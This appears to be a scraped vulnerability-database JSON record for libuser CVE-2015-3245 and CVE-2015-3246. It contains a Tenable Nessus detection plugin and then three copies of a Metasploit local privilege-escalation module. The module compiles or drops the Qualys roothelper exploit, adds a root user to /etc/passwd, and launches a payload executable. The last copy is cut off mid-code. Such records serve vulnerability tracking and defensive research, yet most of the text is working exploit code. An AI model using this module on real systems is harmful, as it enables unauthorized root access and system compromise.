be combined with CVE-2015-3245 to gain\nprivileges.\n\nIn addition the usermode package, which depends on libuser, was\nrebuilt against the updated version.\n\nFor Debian 7 ", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DLA-468.NASL", "href": "https://www.tenable.com/plugins/nessus/91108", "published": "2016-05-13T00:00:00", "title": "Debian DLA-468-1 : libuser security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-468-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91108);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/06 11:26:06\");\n\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_bugtraq_id(76021, 76022);\n script_xref(name:\"IAVA\", value:\"2015-A-0179\");\n\n script_name(english:\"Debian DLA-468-1 : libuser security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two security vulnerabilities were discovered in libuser, a library\nthat implements a standardized interface for manipulating and\nadministering user and group accounts, that could lead to a denial of\nservice or privilege escalation by local users.\n\nCVE-2015-3245 Incomplete blacklist vulnerability in the chfn function\nin libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the\nuserhelper program in the usermode package, allows local users to\ncause a denial of service (/etc/passwd corruption) via a newline\ncharacter in the GECOS field.\n\nCVE-2015-3246 libuser before 0.56.13-8 and 0.60 before 0.60-7, as used\nin the userhelper program in the usermode package, directly modifies\n/etc/passwd, which allows local users to cause a denial of service\n(inconsistent file state) by causing an error during the modification.\nNOTE: this issue can be combined with CVE-2015-3245 to gain\nprivileges.\n\nIn addition the usermode package, which depends on libuser, was\nrebuilt against the updated version.\n\nFor Debian 7 'Wheezy', these problems have been fixed in\n\nlibuser 1:0.56.9.dfsg.1-1.2+deb7u1 usermode 1.109-1+deb7u2\n\nWe recommend that you upgrade your libuser and usermode packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/05/msg00021.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libuser\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Libuser roothelper Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libuser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libuser1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libuser1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-libuser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libuser\", reference:\"1:0.56.9.dfsg.1-1.2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libuser1\", reference:\"1:0.56.9.dfsg.1-1.2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libuser1-dev\", reference:\"1:0.56.9.dfsg.1-1.2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libuser\", reference:\"1:0.56.9.dfsg.1-1.2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-05-24T14:21:52", "bulletinFamily": "exploit", "description": "Libuser - 'roothelper' Privilege Escalation (Metasploit). CVE-2015-3245,CVE-2015-3246. Local exploit for Linux platform. Tags: Metasploit Framework (MSF), Local", "modified": "2018-05-16T00:00:00", "published": "2018-05-16T00:00:00", "id": "EDB-ID:44633", "href": "https://www.exploit-db.com/exploits/44633/", "type": "exploitdb", "title": "Libuser - 'roothelper' Privilege Escalation (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Libuser roothelper Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Red Hat based Linux\r\n systems, including RHEL, Fedora and CentOS, by exploiting a newline\r\n injection vulnerability in libuser and userhelper versions prior to\r\n 0.56.13-8 and version 0.60 before 0.60-7.\r\n\r\n This module makes use of the roothelper.c exploit from Qualys to\r\n insert a new user with UID=0 in /etc/passwd.\r\n\r\n Note, the password for the current user is required by userhelper.\r\n\r\n Note, on some systems, such as Fedora 11, the user entry for the\r\n current user in /etc/passwd will become corrupted and exploitation\r\n will fail.\r\n\r\n This module has been tested successfully on libuser packaged versions\r\n 0.56.13-4.el6 on CentOS 6.0 (x86_64);\r\n 0.56.13-5.el6 on CentOS 6.5 (x86_64);\r\n 0.60-5.el7 on CentOS 7.1-1503 (x86_64);\r\n 0.56.16-1.fc13 on Fedora 13 (i686);\r\n 0.59-1.fc19 on Fedora Desktop 19 (x86_64);\r\n 0.60-3.fc20 on Fedora Desktop 20 (x86_64);\r\n 0.60-6.fc21 on Fedora Desktop 21 (x86_64);\r\n 0.60-6.fc22 on Fedora Desktop 22 (x86_64);\r\n 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and\r\n 0.60-5.el7 on Red Hat 7.0 (x86_64).\r\n\r\n RHEL 5 is vulnerable, however the installed version of glibc (2.5)\r\n is missing various functions required by roothelper.c.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and C exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Jul 24 2015',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'roothelper.c' ],\r\n [ 'EDB', '37706' ],\r\n [ 'CVE', '2015-3245' ],\r\n [ 'CVE', '2015-3246' ],\r\n [ 'BID', '76021' ],\r\n [ 'BID', '76022' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],\r\n [ 'URL', 'https://access.redhat.com/articles/1537873' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def password\r\n datastore['PASSWORD'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def live_compile?\r\n compile = false\r\n\r\n if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n compile = true\r\n else\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n end\r\n\r\n compile\r\n end\r\n\r\n def check\r\n userhelper_path = '/usr/sbin/userhelper'\r\n unless setuid? userhelper_path\r\n vprint_error \"#{userhelper_path} is not setuid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{userhelper_path} is setuid\"\r\n\r\n unless command_exists? 'script'\r\n vprint_error \"script is not installed. Exploitation will fail.\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'script is installed'\r\n\r\n if cmd_exec('lsattr /etc/passwd').include? 'i'\r\n vprint_error 'File /etc/passwd is immutable'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'File /etc/passwd is not immutable'\r\n\r\n glibc_banner = cmd_exec 'ldd --version'\r\n glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\\s+\\(.*\\)\\s+([\\d\\.]+)/).flatten.first\r\n if glibc_version.to_s.eql? ''\r\n vprint_error 'Could not determine the GNU C library version'\r\n return CheckCode::Detected\r\n end\r\n\r\n # roothelper.c requires functions only available since glibc 2.6+\r\n if glibc_version < Gem::Version.new('2.6')\r\n vprint_error \"GNU C Library version #{glibc_version} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"GNU C Library version #{glibc_version} is supported\"\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n if check == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n\r\n # Upload Qualys' roothelper.c exploit:\r\n # - https://www.exploit-db.com/exploits/37706/\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'\r\n fd = ::File.open path, 'rb'\r\n c_code = fd.read fd.stat.size\r\n fd.close\r\n upload \"#{executable_path}.c\", c_code\r\n output = cmd_exec \"gcc -o #{executable_path} #{executable_path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{executable_path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{executable_path}\"\r\n register_file_for_cleanup executable_path\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n\r\n # Cross-compiled with:\r\n # - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'\r\n fd = ::File.open path, 'rb'\r\n executable_data = fd.read fd.stat.size\r\n fd.close\r\n upload_and_chmodx executable_path, executable_data\r\n end\r\n\r\n # Run roothelper\r\n timeout = 180\r\n print_status \"Launching roothelper exploit (Timeout: #{timeout})...\"\r\n output = cmd_exec \"echo #{password.gsub(/'/, \"\\\\\\\\'\")} | #{executable_path}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n if output =~ %r{Creating a backup copy of \"/etc/passwd\" named \"(.*)\"}\r\n register_file_for_cleanup $1\r\n end\r\n\r\n if output =~ /died in parent: .*.c:517: forkstop_userhelper/\r\n fail_with Failure::NoAccess, 'Incorrect password'\r\n end\r\n\r\n @username = nil\r\n\r\n if output =~ /Exploit successful, run \"su ([a-z])\" to become root/\r\n @username = $1\r\n end\r\n\r\n if @username.blank?\r\n fail_with Failure::Unknown, 'Something went wrong'\r\n end\r\n\r\n print_good \"Success! User '#{@username}' added to /etc/passwd\"\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Execute payload executable\r\n vprint_status 'Executing payload...'\r\n cmd_exec \"script -c \\\"su - #{@username} -c #{payload_path}\\\" | sh & echo \"\r\n register_file_for_cleanup 'typescript'\r\n end\r\n\r\n #\r\n # Remove new user from /etc/passwd\r\n #\r\n def on_new_session(session)\r\n new_user_removed = false\r\n\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n\r\n # Remove new user\r\n session.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' /etc/passwd\\\"\"\r\n\r\n # Wait for clean up\r\n Rex.sleep 5\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_contents = session.fs.file.open('/etc/passwd').read.to_s\r\n unless passwd_contents =~ /^#{@username}:/\r\n new_user_removed = true\r\n end\r\n elsif session.type.to_s.eql? 'shell'\r\n # Remove new user\r\n session.shell_command_token \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\"\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_user = session.shell_command_token \"grep '#{@username}:' /etc/passwd\"\r\n unless passwd_user =~ /^#{@username}:/\r\n new_user_removed = true\r\n end\r\n end\r\n\r\n unless new_user_removed\r\n print_warning \"Could not remove user '#{@username}' from /etc/passwd\"\r\n end\r\n rescue => e\r\n print_error \"Error during cleanup: #{e.message}\"\r\n ensure\r\n super\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44633/"}], "zdt": [{"lastseen": "2018-05-15T23:55:45", "bulletinFamily": "exploit", "description": "This Metasploit module attempts to gain root privileges on Red Hat based Linux systems, including RHEL, Fedora and CentOS, by exploiting a newline injection vulnerability in libuser and userhelper versions prior to 0.56.13-8 and version 0.60 before 0.60-7. This Metasploit module makes use of the roothelper.c exploit from Qualys to insert a new user with UID=0 in /etc/passwd. Note, the password for the current user is required by userhelper. Note, on some systems, such as Fedora 11, the user entry for the current user in /etc/passwd will become corrupted and exploitation will fail. This Metasploit module has been tested successfully on libuser packaged versions 0.56.13-4.el6 on CentOS 6.0 (x86_64); 0.56.13-5.el6 on CentOS 6.5 (x86_64); 0.60-5.el7 on CentOS 7.1-1503 (x86_64); 0.56.16-1.fc13 on Fedora 13 (i686); 0.59-1.fc19 on Fedora Desktop 19 (x86_64); 0.60-3.fc20 on Fedora Desktop 20 (x86_64); 0.60-6.fc21 on Fedora Desktop 21 (x86_64); 0.60-6.fc22 on Fedora Desktop 22 (x86_64); 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and 0.60-5.el7 on Red Hat 7.0 (x86_64). RHEL 5 is vulnerable, however the installed version of glibc (2.5) is missing various functions required by roothelper.c.", "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "1337DAY-ID-30355", "href": "https://0day.today/exploit/description/30355", "title": "Libuser roothelper Privilege Escalation Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Libuser roothelper Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Red Hat based Linux\r\n systems, including RHEL, Fedora and CentOS, by exploiting a newline\r\n injection vulnerability in libuser and userhelper versions prior to\r\n 0.56.13-8 and version 0.60 before 0.60-7.\r\n\r\n This module makes use of the roothelper.c exploit from Qualys to\r\n insert a new user with UID=0 in /etc/passwd.\r\n\r\n Note, the password for the current user is required by userhelper.\r\n\r\n Note, on some systems, such as Fedora 11, the user entry for the\r\n current user in /etc/passwd will become corrupted and exploitation\r\n will fail.\r\n\r\n This module has been tested successfully on libuser packaged versions\r\n 0.56.13-4.el6 on CentOS 6.0 (x86_64);\r\n 0.56.13-5.el6 on CentOS 6.5 (x86_64);\r\n 0.60-5.el7 on CentOS 7.1-1503 (x86_64);\r\n 0.56.16-1.fc13 on Fedora 13 (i686);\r\n 0.59-1.fc19 on Fedora Desktop 19 (x86_64);\r\n 0.60-3.fc20 on Fedora Desktop 20 (x86_64);\r\n 0.60-6.fc21 on Fedora Desktop 21 (x86_64);\r\n 0.60-6.fc22 on Fedora Desktop 22 (x86_64);\r\n 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and\r\n 0.60-5.el7 on Red Hat 7.0 (x86_64).\r\n\r\n RHEL 5 is vulnerable, however the installed version of glibc (2.5)\r\n is missing various functions required by roothelper.c.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and C exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Jul 24 2015',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'roothelper.c' ],\r\n [ 'EDB', '37706' ],\r\n [ 'CVE', '2015-3245' ],\r\n [ 'CVE', '2015-3246' ],\r\n [ 'BID', '76021' ],\r\n [ 'BID', '76022' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],\r\n [ 'URL', 'https://access.redhat.com/articles/1537873' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def password\r\n datastore['PASSWORD'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def live_compile?\r\n compile = false\r\n\r\n if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n compile = true\r\n else\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n end\r\n\r\n compile\r\n end\r\n\r\n def check\r\n userhelper_path = '/usr/sbin/userhelper'\r\n unless setuid? userhelper_path\r\n vprint_error \"#{userhelper_path} is not setuid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{userhelper_path} is setuid\"\r\n\r\n unless command_exists? 'script'\r\n vprint_error \"script is not installed. Exploitation will fail.\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'script is installed'\r\n\r\n if cmd_exec('lsattr /etc/passwd').include? 'i'\r\n vprint_error 'File /etc/passwd is immutable'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'File /etc/passwd is not immutable'\r\n\r\n glibc_banner = cmd_exec 'ldd --version'\r\n glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\\s+\\(.*\\)\\s+([\\d\\.]+)/).flatten.first\r\n if glibc_version.to_s.eql? ''\r\n vprint_error 'Could not determine the GNU C library version'\r\n return CheckCode::Detected\r\n end\r\n\r\n # roothelper.c requires functions only available since glibc 2.6+\r\n if glibc_version < Gem::Version.new('2.6')\r\n vprint_error \"GNU C Library version #{glibc_version} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"GNU C Library version #{glibc_version} is supported\"\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n if check == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n\r\n # Upload Qualys' roothelper.c exploit:\r\n # - https://www.exploit-db.com/exploits/37706/\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'\r\n fd = ::File.open path, 'rb'\r\n c_code = fd.read fd.stat.size\r\n fd.close\r\n upload \"#{executable_path}.c\", c_code\r\n output = cmd_exec \"gcc -o #{executable_path} #{executable_path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{executable_path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{executable_path}\"\r\n register_file_for_cleanup executable_path\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n\r\n # Cross-compiled with:\r\n # - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'\r\n fd = ::File.open path, 'rb'\r\n executable_data = fd.read fd.stat.size\r\n fd.close\r\n upload_and_chmodx executable_path, executable_data\r\n end\r\n\r\n # Run roothelper\r\n timeout = 180\r\n print_status \"Launching roothelper exploit (Timeout: #{timeout})...\"\r\n output = cmd_exec \"echo #{password.gsub(/'/, \"\\\\\\\\'\")} | #{executable_path}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n if output =~ %r{Creating a backup copy of \"/etc/passwd\" named \"(.*)\"}\r\n register_file_for_cleanup $1\r\n end\r\n\r\n if output =~ /died in parent: .*.c:517: forkstop_userhelper/\r\n fail_with Failure::NoAccess, 'Incorrect password'\r\n end\r\n\r\n @username = nil\r\n\r\n if output =~ /Exploit successful, run \"su ([a-z])\" to become root/\r\n @username = $1\r\n end\r\n\r\n if @username.blank?\r\n fail_with Failure::Unknown, 'Something went wrong'\r\n end\r\n\r\n print_good \"Success! User '#{@username}' added to /etc/passwd\"\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Execute payload executable\r\n vprint_status 'Executing payload...'\r\n cmd_exec \"script -c \\\"su - #{@username} -c #{payload_path}\\\" | sh & echo \"\r\n register_file_for_cleanup 'typescript'\r\n end\r\n\r\n #\r\n # Remove new user from /etc/passwd\r\n #\r\n def on_new_session(session)\r\n new_user_removed = false\r\n\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n\r\n # Remove new user\r\n session.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' /etc/passwd\\\"\"\r\n\r\n # Wait for clean up\r\n Rex.sleep 5\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_contents = session.fs.file.open('/etc/passwd').read.to_s\r\n unless passwd_contents =~ /^#{@username}:/\r\n new_user_removed = true\r\n end\r\n elsif session.type.to_s.eql? 'shell'\r\n # Remove new user\r\n session.shell_command_token \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\"\r\n\r\n # Check for new user in /etc/passwd\r\n passwd_user = session.shell_command_token \"grep '#{@username}:' /etc/passwd\"\r\n unless passwd_user =~ /^#{@username}:/\r\n new_user_removed = true\r\n end\r\n end\r\n\r\n unless new_user_removed\r\n print_warning \"Could not remove user '#{@username}' from /etc/passwd\"\r\n end\r\n rescue => e\r\n print_error \"Error during cleanup: #{e.message}\"\r\n ensure\r\n super\r\n end\r\nend\n\n# 0day.today [2018-05-15] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30355"}], "packetstorm": [{"lastseen": "2018-05-14T01:10:49", "bulletinFamily": "exploit", "description": "", "modified": "2018-05-13T00:00:00", "published": "2018-05-13T00:00:00", "id": "PACKETSTORM:147599", "href": "https://packetstormsecurity.com/files/147599/Libuser-roothelper-Privilege-Escalation.html", "title": "Libuser roothelper Privilege Escalation", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Libuser roothelper Privilege Escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges on Red Hat based Linux \nsystems, including RHEL, Fedora and CentOS, by exploiting a newline \ninjection vulnerability in libuser and userhelper versions prior to \n0.56.13-8 and version 0.60 before 0.60-7. \n \nThis module makes use of the roothelper.c exploit from Qualys to \ninsert a new user with UID=0 in /etc/passwd. \n \nNote, the password for the current user is required by userhelper. \n \nNote, on some systems, such as Fedora 11, the user entry for the \ncurrent user in /etc/passwd will become corrupted and exploitation \nwill fail. \n \nThis module has been tested successfully on libuser packaged versions \n0.56.13-4.el6 on CentOS 6.0 (x86_64); \n0.56.13-5.el6 on CentOS 6.5 (x86_64); \n0.60-5.el7 on CentOS 7.1-1503 (x86_64); \n0.56.16-1.fc13 on Fedora 13 (i686); \n0.59-1.fc19 on Fedora Desktop 19 (x86_64); \n0.60-3.fc20 on Fedora Desktop 20 (x86_64); \n0.60-6.fc21 on Fedora Desktop 21 (x86_64); \n0.60-6.fc22 on Fedora Desktop 22 (x86_64); \n0.56.13-5.el6 on Red Hat 6.6 (x86_64); and \n0.60-5.el7 on Red Hat 7.0 (x86_64). \n \nRHEL 5 is vulnerable, however the installed version of glibc (2.5) \nis missing various functions required by roothelper.c. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # Discovery and C exploit \n'Brendan Coles' # Metasploit \n], \n'DisclosureDate' => 'Jul 24 2015', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'AKA', 'roothelper.c' ], \n[ 'EDB', '37706' ], \n[ 'CVE', '2015-3245' ], \n[ 'CVE', '2015-3246' ], \n[ 'BID', '76021' ], \n[ 'BID', '76022' ], \n[ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ], \n[ 'URL', 'https://access.redhat.com/articles/1537873' ] \n], \n'DefaultTarget' => 0)) \nregister_options [ \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), \nOptString.new('PASSWORD', [ true, 'Password for the current user', '' ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef password \ndatastore['PASSWORD'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef live_compile? \ncompile = false \n \nif datastore['COMPILE'].eql?('Auto') || 